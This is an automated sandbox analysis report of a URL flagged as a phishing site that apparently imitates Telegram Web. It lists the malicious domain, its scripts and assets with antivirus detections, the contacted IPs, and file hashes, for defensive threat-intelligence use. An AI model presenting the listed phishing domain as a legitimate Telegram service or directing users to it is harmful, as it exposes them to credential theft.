
This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://wkybcnfuqpgjx.ltd/100%Avira URL Cloudphishing
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1ec.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ef-1f1f2.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1fe.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f0.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1f7.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1f3.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1fb-1f1e8.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1ff.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1ea.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f5-1f1ed.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1f9.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1f2.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/main.d54bfa037348b154a941.js100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1fb.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/5284.41380bbee618193f889a.js100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1e9.png100%Avira URL Cloudphishing
https://hu.bafanglaicai.app/script.js0%Avira URL Cloudsafe
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1ec.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ea-1f1f7.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1ed.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f0-1f1fc.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1ea.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1e9.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1fb-1f1ec.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1ee.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1fe.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1ea.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1f2.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1ff.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f4.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/compatTest.js100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/favicon.ico100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/rlottie-wasm.f013598f1b2ba719f25e.js100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1ea.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e9-1f1f2.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1f3.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/notification.mp3100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1f7.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1f3.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1f6.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1fe.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1fc.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ed-1f1f9.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1e7.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1f0.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/KFOlCnqEu92Fr1MmEU9fBBc4AMP6lQ.324b1e6d0f5ae7c6ab42.woff2100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1f7.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/7784.df07a876b22e3b2a83e9.js100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/redirect.js100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ee-1f1f6.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1ff.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1e9.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/chat-bg-pattern-light.ee148af944f6580293ae.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f8.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1e6.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1ed.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1ef.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ea-1f1ea.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ef-1f1f5.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f0-1f1ff.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f0-1f1f5.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1fd.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1fc.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1f3.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1eb-1f1f2.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ff-1f1e6.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1f0.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1fa.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1f1.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f5-1f1fc.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ea-1f1e8.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1e9.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e9-1f1ea.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1f2.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1eb.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1e6.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1f7.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1ee.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1fa-1f1ec.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1f9.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f3.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1ed.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/KFOmCnqEu92Fr1Mu4mxKKTU1Kg.465390c6e54c60f4a15f.woff2100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f7-1f1fa.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1ed.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1eb.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1f2.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1fc.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e9-1f1ff.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ee-1f1e9.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1eb-1f1f7.png100%Avira URL Cloudphishing
https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1e6.png100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    zws2.web.telegram.org
    149.154.167.99
    truefalse
      high
      wkybcnfuqpgjx.ltd
      172.67.137.41
      truetrue
        unknown
        telegram.me
        149.154.167.99
        truefalse
          high
          t.me
          149.154.167.99
          truefalse
            high
            www.google.com
            216.58.206.36
            truefalse
              high
              zws2-1.web.telegram.org
              149.154.167.99
              truefalse
                high
                hu.bafanglaicai.app
                104.21.42.79
                truefalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1f7.pngtrue
                  • Avira URL Cloud: phishing
                  unknown
                  https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f0.pngtrue
                  • Avira URL Cloud: phishing
                  unknown
                  https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f5-1f1ed.pngtrue
                  • Avira URL Cloud: phishing
                  unknown
                  https://a.nel.cloudflare.com/report/v4?s=XUwKmjpcSDfeSwpONtGBRtsQkHNwzdRTXV29zWBNB%2FFsjFHH5fXaSegB0OFnbrvCqmOIaVQVE4CrA5b5iCpDjFfM56lC1nyx3OS61FuNiK4X1hxqArPSA%2FnkSJVe%2FB1QJr2ewg%3D%3Dfalse
                    high
                    https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ef-1f1f2.pngtrue
                    • Avira URL Cloud: phishing
                    unknown
                    https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1ec.pngtrue
                    • Avira URL Cloud: phishing
                    unknown
                    https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1ff.pngtrue
                    • Avira URL Cloud: phishing
                    unknown
                    https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1f3.pngtrue
                    • Avira URL Cloud: phishing
                    unknown
                    https://wkybcnfuqpgjx.ltd/img-apple-160/1f1fb-1f1e8.pngtrue
                    • Avira URL Cloud: phishing
                    unknown
                    https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1ea.pngtrue
                    • Avira URL Cloud: phishing
                    unknown
                    https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1fe.pngtrue
                    • Avira URL Cloud: phishing
                    unknown
                    https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1f9.pngtrue
                    • Avira URL Cloud: phishing
                    unknown
                    https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1f2.pngtrue
                    • Avira URL Cloud: phishing
                    unknown
                    https://wkybcnfuqpgjx.ltd/main.d54bfa037348b154a941.jstrue
                    • Avira URL Cloud: phishing
                    unknown
                    https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1fb.pngtrue
                    • Avira URL Cloud: phishing
                    unknown
                    https://hu.bafanglaicai.app/script.jsfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ea-1f1f7.pngtrue
                    • Avira URL Cloud: phishing
                    unknown
                    https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1e9.pngtrue
                    • Avira URL Cloud: phishing
                    unknown
                    https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1ec.pngtrue
                    • Avira URL Cloud: phishing
                    unknown
                    https://wkybcnfuqpgjx.ltd/5284.41380bbee618193f889a.jstrue
                    • Avira URL Cloud: phishing
                    unknown
                    https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1ed.pngtrue
                    • Avira URL Cloud: phishing
                    unknown
                    https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f0-1f1fc.pngtrue
                    • Avira URL Cloud: phishing
                    unknown
                    https://zws2-1.web.telegram.org/apiwsfalse
                      high
                      https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1e9.pngtrue
                      • Avira URL Cloud: phishing
                      unknown
                      https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1ea.pngtrue
                      • Avira URL Cloud: phishing
                      unknown
                      https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1ea.pngtrue
                      • Avira URL Cloud: phishing
                      unknown
                      https://zws2.web.telegram.org/apiwsfalse
                        high
                        https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1f2.pngtrue
                        • Avira URL Cloud: phishing
                        unknown
                        https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1ee.pngtrue
                        • Avira URL Cloud: phishing
                        unknown
                        https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1fe.pngtrue
                        • Avira URL Cloud: phishing
                        unknown
                        https://wkybcnfuqpgjx.ltd/img-apple-160/1f1fb-1f1ec.pngtrue
                        • Avira URL Cloud: phishing
                        unknown
                        https://wkybcnfuqpgjx.ltd/true
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1ff.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f4.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/compatTest.jstrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/favicon.icotrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/rlottie-wasm.f013598f1b2ba719f25e.jstrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e9-1f1f2.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1ea.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1f3.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/notification.mp3true
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1f3.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1f7.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1f6.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1fe.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ed-1f1f9.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1fc.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1e7.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1f0.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/KFOlCnqEu92Fr1MmEU9fBBc4AMP6lQ.324b1e6d0f5ae7c6ab42.woff2true
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1f7.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ee-1f1f6.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/7784.df07a876b22e3b2a83e9.jstrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/redirect.jstrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1ff.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1e9.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/chat-bg-pattern-light.ee148af944f6580293ae.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f8.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ef-1f1f5.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1e6.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1ed.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ea-1f1ea.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1ef.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1fc.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f0-1f1ff.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1fd.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f0-1f1f5.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1f3.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1eb-1f1f2.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ff-1f1e6.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1f0.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1fa.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f5-1f1fc.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1f1.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ea-1f1e8.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1e9.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e9-1f1ea.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1f2.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1e6.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1eb.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1f7.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1ee.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1fa-1f1ec.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1ed.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1f9.pngtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://a.nel.cloudflare.com/report/v4?s=%2F%2BX7FWk81LDOT34xUgcuOMWwnzaX8wTb%2F9QNP1p7JHLKt%2FxM%2FpgRdKuoSYXULY%2F9dmMkC1lxEb4Sxgl6zdhykoqyv%2FcrIpgdXSZMWGDeRDodc%2B%2BWOYQBVdSyUgnwAZad1fjpuilyfalse
                            high
                            https://wkybcnfuqpgjx.ltd/KFOmCnqEu92Fr1Mu4mxKKTU1Kg.465390c6e54c60f4a15f.woff2true
                            • Avira URL Cloud: phishing
                            unknown
                            https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f3.pngtrue
                            • Avira URL Cloud: phishing
                            unknown
                            https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1ed.pngtrue
                            • Avira URL Cloud: phishing
                            unknown
                            https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f7-1f1fa.pngtrue
                            • Avira URL Cloud: phishing
                            unknown
                            https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1eb.pngtrue
                            • Avira URL Cloud: phishing
                            unknown
                            https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e6-1f1f2.pngtrue
                            • Avira URL Cloud: phishing
                            unknown
                            https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e9-1f1ff.pngtrue
                            • Avira URL Cloud: phishing
                            unknown
                            https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1fc.pngtrue
                            • Avira URL Cloud: phishing
                            unknown
                            https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ee-1f1e9.pngtrue
                            • Avira URL Cloud: phishing
                            unknown
                            https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1e6.pngtrue
                            • Avira URL Cloud: phishing
                            unknown
                            https://wkybcnfuqpgjx.ltd/img-apple-160/1f1eb-1f1f7.pngtrue
                            • Avira URL Cloud: phishing
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://telegram.org/tos/mini-appschromecache_484.3.dr, chromecache_185.3.drfalse
                              high
                              https://web.telegram.org/chromecache_431.3.drfalse
                                high
                                http://telegram.org/dlchromecache_316.3.dr, chromecache_383.3.drfalse
                                  high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  104.21.42.79
                                  hu.bafanglaicai.appUnited States
                                  13335CLOUDFLARENETUSfalse
                                  172.67.159.63
                                  unknownUnited States
                                  13335CLOUDFLARENETUSfalse
                                  216.58.206.36
                                  www.google.comUnited States
                                  15169GOOGLEUSfalse
                                  149.154.167.99
                                  zws2.web.telegram.orgUnited Kingdom
                                  62041TELEGRAMRUfalse
                                  172.67.137.41
                                  wkybcnfuqpgjx.ltdUnited States
                                  13335CLOUDFLARENETUStrue
                                  239.255.255.250
                                  unknownReserved
                                  unknownunknownfalse
                                  35.190.80.1
                                  a.nel.cloudflare.comUnited States
                                  15169GOOGLEUSfalse
                                  IP
                                  192.168.2.4
                                  192.168.2.6
                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1589319
                                  Start date and time:2025-01-12 01:02:41 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 27s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:browseurl.jbs
                                  Sample URL:https://wkybcnfuqpgjx.ltd/
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:11
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal60.win@18/691@32/9
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  • Exclude process from analysis (whitelisted): audiodg.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 172.217.18.3, 142.250.184.206, 142.250.110.84, 216.58.206.46, 216.58.212.174, 142.250.74.202, 142.250.185.106, 142.250.181.234, 142.250.185.202, 216.58.206.42, 142.250.184.202, 142.250.186.138, 172.217.23.106, 142.250.186.170, 172.217.18.10, 142.250.186.106, 142.250.185.170, 142.250.185.234, 142.250.186.42, 172.217.16.138, 142.250.186.74, 192.229.221.95, 199.232.210.172, 142.250.184.238, 142.250.185.206, 172.217.23.110, 142.250.186.46, 172.217.18.110, 142.250.186.78, 142.250.185.99, 199.232.214.172, 184.28.90.27, 2.23.242.162, 13.107.246.45, 172.202.163.200
                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                                  • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing network information.
                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: https://wkybcnfuqpgjx.ltd/
                                  No simulations
                                  No context
                                  No context
                                  No context
                                  No context
                                  No context
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3986
                                  Entropy (8bit):7.89342242843146
                                  Encrypted:false
                                  SSDEEP:96:Li0QlwcV8WFPwEX9zQXsrTCDeSsaCuY8TdoXmdibMtx:G00wcV8WB9zQXsTCDeHazoXmc2
                                  MD5:9596CF715CC1FE885F6000866C7F165C
                                  SHA1:C1C8DBE7B96FDD1817B393DF070C1B6DF4FD8253
                                  SHA-256:FE7C25755248B8BE3BB2EFB4AFFCB90D67A3FEBAE1953B70DE593C209322C916
                                  SHA-512:06A4F10A25A61C3B9430FE9B753BD451D961D73E783B15B953F0155DA0CD6067DD225238EF80C04B1CCA548F88DF402D9543FF1561B599AF84EA606C4EB84635
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f5-1f1f8.png
